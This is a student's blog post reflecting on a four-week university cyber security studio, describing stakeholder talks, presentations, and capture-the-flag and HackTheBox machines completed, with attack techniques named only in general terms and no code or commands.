Introduction

My time participating in Summer Studio B has been amazing. The Cyber Security Studio has really helped me develop my skills and increase my confidence when doing security challenges. The following post contains my final reflections and provides evidence of how I’ve been able to meet the five Subject Learning Outcomes (SLO) that were introduced at the start of the studio. I’ve really enjoyed myself taking this studio subject and the benefits that it has provided me are immeasureable. I really want to thank the studio tutors Larry, Darsh, Jai and Luke for all they’ve done to help me develop my skills and for the great opportunities that they have provided us with.


Final Reflection

SLO 1 - Engage with stakeholders to identify a problem

This studio was a bit different to the other studios in the sense that there wasn’t just one problem statement that we established in the first week and then try to design a solution for. Each week I found myself redefining my problem statement, till eventually I refined my final problem statement of "Insecure, outdated applications and systems used by businesses will negatively impact stakeholders reputation, finance and consumer trust if they are ever exploited.". I was able to reach this problem definition by engaging with multiple stakeholders including:

  • Robert Mitchell from GitLab (Week 1)
  • Raaqim Mohammed, security consultant at PWC (Week 2)
  • Viren Khatri, Simon Baeg and Nathan Jones from the Deloitte Cyber Attack Team (Week 3)
  • Ruben Thijssen from Symantec (Week 4)
  • My tutors Larry, Jai, Darsh and Luke (Every week)

Each engagement with these stakeholders provided me with a new perspective on my problem and allowed me to continually develop and shape my final problem statement. My problem statement went through a metamorphisis with:

  • Week 1:
    "Human error is complicit in the majority of data breaches that occur due to poor education and training"
  • Week 2:
    "The increasing adoption of web applications by businesses as a platform to undertake operations can result in negative impact to businesses given the insecure nature of web applications and the numerous vulnerabilities that can be used to exploit web applications"

My final problem statement encompasses the issues that I highlighted in both previous problem statements. Human error whether it be malicious or not is one of the lead contributing factors in data breaches, all it takes is just one person to click the wrong link for a malicous actor to cause damage. This is mostly a result of poor education and training in conjunction with exploits that can be leveraged against insecure applications, always make sure that applications you use are up to date with the latest security patches. In my final problem statement, web applications are also included under the banner of insecure, outdated applications and systems. I proved throughout the studio with a variety of vulnerable machines that it is possible to go from an insecure website to the root user or a machine, being the owner of a machine, you can do anything you want to the machine, including deleting the entire contents of the system, resulting in negative financial and operational impacts which will prove costly to stakeholders of a business.

SLO 2 - Apply design thinking to respond to a defined or newly identified problem

At the start of the studio, I struggled with utilising design thinking properly, however throughout later stages of the studio I found that I was able to employ design thinking quite effectively when approaching challenges. The practice of testing vulnerable machines that were modelled after machines that were present in the world allowed me to gain greater insight into the impacts that improperly patched systems would have on stakeholders. It was interesting using the steps in the design thinking process and applying them to problems that I faced on challenges.

The steps of define, ideate, test and implement were especially useful in completing challenges. To solve a challenge, we can follow these steps:

  1. Define your goal
    i.e. getting root access on a machine
  2. Brainstorm techniques or exploits that can be used to achieve your goal
    i.e. checking sticky bits for privilege escalation, stored XSS to steal an admin cookie
  3. Start testing your techniques and exploits to see if any extra information is exposed or if an exploit works
    i.e. start deploying exploits and leveraging techniques to see if theres a chance of success
  4. After finding a successful technique, implement that techniques/exploit and achieve your goal
    i.e. getting a root shell from a misconfigured service, stealing an admin cookie and logging into their account

Being able to follow this process and get root access to a number of machines, I was starting to realise the impact that businesses would face if they were using insecure, outdated applications. Considering that root level users could essentially do as they pleased with the machine, for example delete the entire file structure and back ups, it was imagine the financial and reputation loss that a business would face if their systems or applications were ever exploited.

The fresh perspectives that industry visitors brought to the table were especially useful in gaining an insight into the damage that a business would face if they were ever breached as well as the impact that breaches would inflict on customers. My research task in Week 1 was helpful in quantifying potential financial damage numbers that could have occured if the Steam CD Key bug was undetected. I felt that I was able to successfully employ design thinking to solve challenges, break into and own vulnerable machines and to redefine my problem statement.

SLO 3 - Apply technical skills to develop, model and/or evaluate design

Throughout the entirety of the studio, I was required to apply my technical skills quite extensively in order to meet deliverables and to get root access on vulnerable machines. I’ve included a list of what I did each week that required use of technical skills:

  • Week 1:

    • Leverage web hacking knowledge to complete challenges on OWASP Juice Shop app (evidence can be found on my week 1 reflection here)
    • Techniques leveraged:
      • SQL Injection
      • Cookie Manipulation
      • Stored XSS
  • Week 2:

    • More advanced web application penetration testing, completed the Lernaean challenge on HackTheBox, evidence can be found here and the first challenge for the MrRobotCTF
    • Techniques leveraged:
      • Password brute forcing with Hydra
      • Directory enumeration
  • Week 3:

    • Completed the beginner machine Toppo on VulnHub, completed the Piper vulnerable machine from the Deloitte Cyber Attack Team and got user access on the Access vulnerable machine on HackTheBox. My write up for Toppo can be found here and my write up for Piper can be found here
    • Techniques leveraged:
      • Nmap scanning
      • Directory enumeration
      • Deploying reverse shells
      • Privilege Escalation through sticky bits and vulnerable web applications
  • Week 4:

    • Completed three machines on HackTheBox, Curling, Irked and Accessas well as Wakanda on VulnHub. Since these are active machines, I’m not allowed to post solutions to these machines based on the HackTheBox Terms of Service.
    • Techniques leveraged:
      • Nmap scanning
      • Privilege escalation with Curl and directory traversal
      • Privilege escalation with sticky bits
      • Privilege escalation with Pip
      • Privilege escalation with the runas command on a windows machine
      • Using metasploit and searchsploit to use payloads/exploits
      • Deploy reverse shells using, netcat and python

In order to get root access on vulnerable machines, I needed to utilise my technical skills in order to navigate, bypass and exploit the vulnerable machines, I feel like I’ve done quite well with using technical skills, during the course of the studio I’ve managed to get root on 6 vulnerable machines which feels quite an achievement for me personally considering I’ve only gotten root on one box previously.

SLO 4 - Demonstrate effective collaboration and communication skills

Collaboration and communication were a big segment of the studio and my personal learning experience. In industry, both of these skills are valuable and essential for success, being able to communicate both to your team to keep them updated with your progress and your struggles, is really important for successful engagements. Also being able to explain technical details and the impacts of vulnerabilities to non-technical people, i.e. C-Suite executives is also really important to get the seriousness of the situation across. Throughout the studio I’ve had the opportunity to both work with other students in group presentation collaboration as well as present on topics to the class by myself about the impacts of vulnerabilities on businesses. The full list of presentations are as follows:

  • Week 1:

    • Group Presentation on a Bug Bounties using the Steam CD Key bug as a case study
    • Slides, artefacts and reflection can be found here
  • Week 2:

    • Solo Presentation on Web Application Security and it’s impacts on stakeholders
    • Slides, artefacts and reflection can be found here
  • Week 3:

    • Group Presentation on Tools used to compromise systems, we used WireShark and CyberChef
    • Slides, artefacts and reflection can be found here
  • Week 4:

    • Solo Presentation for Summer Studio Expo
    • Slides and artefacts can be found here

I’ve included evidence of collaboration work for group presentations in my weekly reflections for Week 1 and 2. Mircosoft Teams and Facebook Messenger were the main means of communication for team presentations, and I felt that we utilised both Microsoft Teams and Planner in order to successfully schedule tasks and communicate with team members in order to complete presentations and provide feedback for each other. Outside of presentations, I worked quite a lot with other students in order to achieve root accesson vulnerable machines. I’ve worked with Frank to get root access on Curling, Max to get root access on Piper and Rowan and Corey to get root access on Access.

In addition to collaboration on group presentations and working on vulnerable machines, studio leaders have facilitated daily stand ups and free-for-all sessions where students can share with each other their greatest discoveries, struggles, progress and plans. I found each of these sessions really insightful and was able to offer suggestions to other students to help them with things that they were struggling with, like helping David get root on Piper.

I feel like I’ve demonstrated really good communication skills based on the feddback that I’ve gotten from studio leaders and tutors, I’ve learned a lot from the feedback I was given, especially adapting presentations to fit the audience that I’m presenting to as well as how to get the most impact with my audience in the shortest amount of time.

SLO 5 - Conduct critical self and peer review and performance evaluation

Being truthful with yourself and being able to identify your own flaws is really important, this allows you to work on on your deficiences and improve yourself overall. Throughout the studio we were given feedback quite regularly by our studio leaders and tutors, I found this invaluable as I was able to gain an outside perspective in addition to my own about what some of my flaws were and what I could do to address and strengthen them. The feedback provided also gave me a good indication of my performance in the subject, it was rewarding to see that my efforts were being recognised. Although my feedback was mainly positive and identified little flaws in my work, I felt that improvements could definitely be made to things that were not graded such as time management and organisation, being able to improve on these two skills allowed me to accomplish more throught the later parts of the studio.

Another mechanic in the studio, daily stand up and free-for-alls were great opportunities to self reflect and identify any personal problems that we were having and how we would address them. Theses stand ups and free-for-alls also allowed us to peer review other students and to identify and help them with things that they were struggling with.

I felt that I was able to successfully conduct critical self review and performance evaluation through the medium of weekly sprint retrospectives that focused on what I though I did well and what I felt needed improvement, these segments were under my Summary (tl;dr) sections in my blog and are intended to provide a short summary of my achievements and struggles throughout the week.


Conclusion

I started out in this subject not really sure what I was really getting myself into. I had developed a list of goals that I wanted to achieve by the end of the studio, these goals were:

  • A portfolio that I can use to find employment
  • More in depth technical knowledge
  • Gain enough experience/knowledge to start hunting bug bounties on the side
  • Actually get employment in security role

The learning journey throughout the studio was not easy by any means, but it allowed me an insight into an industry that I want to spend the foreseeable future in. From the start of the studio where my knowledge was limited and mainly focused on web application security, to being constantly challenged each week to overcome new problems and finally reaching a stage where I can quite happily dive into a bunch of intermediate boot2roots’s and have some notion of what I’m doing, I can confidently say that I have more than met and satisfied two of the goals that I had by the end of the studio.

Being able to get this portfolio up and running was something that I’ve been wanting to achieve for months and having a blog set up in under a week has been one of my highlights of the subject. The existence of this blog will allow me to have a platform that I can use to showcase my activities and achievements and hopefully achieve one of my other goals to get employed.

The logical progression of skills that the studio facilitated, from simple web exploits to more advanced privilege escalation techniques, allowed me to go from a beginner with some security knowledge into someone who’s able to enumerate vulnerable machines and find misconfigurations and exploit them. Coming from achieving a grand total of one easy HackTheBox machine in the past to now when I’ve achieved root access on 3 active machines on HackTheBox, I can safely say that I’ve achieved my goal of gaining a higher degree of technical knowledge.

In hindsight, being able to start hunting for paid bug bounties and gain employment in security related field was relatively unrealisted for a 4 week studio course. However despite not satisfying those two goals in the time period that the studio was running, it doesn’t mean that I still keep them as goals for the near future. In my reflection for week 4, I’ve added a list of goals for the future. Although the studio is over, this is not the end of my learning journey and I’m looking forward to the challanges ahead of me.